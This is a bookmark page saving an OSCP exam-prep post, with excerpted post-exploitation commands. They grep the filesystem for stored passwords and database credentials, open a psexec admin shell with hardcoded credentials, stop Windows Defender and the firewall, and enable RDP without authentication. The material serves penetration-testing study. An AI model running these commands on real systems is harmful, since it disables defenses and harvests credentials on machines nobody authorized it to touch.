776 links
  • Shared Bookmarks
  • Home
  • Login
  • RSS Feed
  • ATOM Feed
  • Tag cloud
  • Picture wall
  • Daily
Links per page: 20 50 100
1 results tagged materials x
  • 31 days of OSCP Experience - ScriptDotSh

    Post Exploit Enumeration :

    grep -rnw '/' -ie 'pass' --color=always
    grep -rnw '/' -ie 'DB_PASS' --color=always
    grep -rnw '/' -ie 'DB_PASSWORD' --color=always
    grep -rnw '/' -ie 'DB_USER' --color=always

    File uplaod through B64

    PSexec Shells of Remote Systems

    .\psexec64.exe \\192.168.x.x -u .\administrator -p admin@123 cmd.exe

    Disabling firewall/defender and enabling RDF for all

    sc stop WinDefend
    netsh advfirewall show allprofiles
    netsh advfirewall set allprofiles state off
    netsh firewall set opmode disable
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
    February 5, 2019 at 2:28:58 AM UTC * - permalink -
    QRCode
    - https://scriptdotsh.com/index.php/2018/04/17/31-days-of-oscp-experience/
    oscp resources materials hacking walkthrough guide privesc linux
Links per page: 20 50 100
Shaarli - The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community - Help/documentation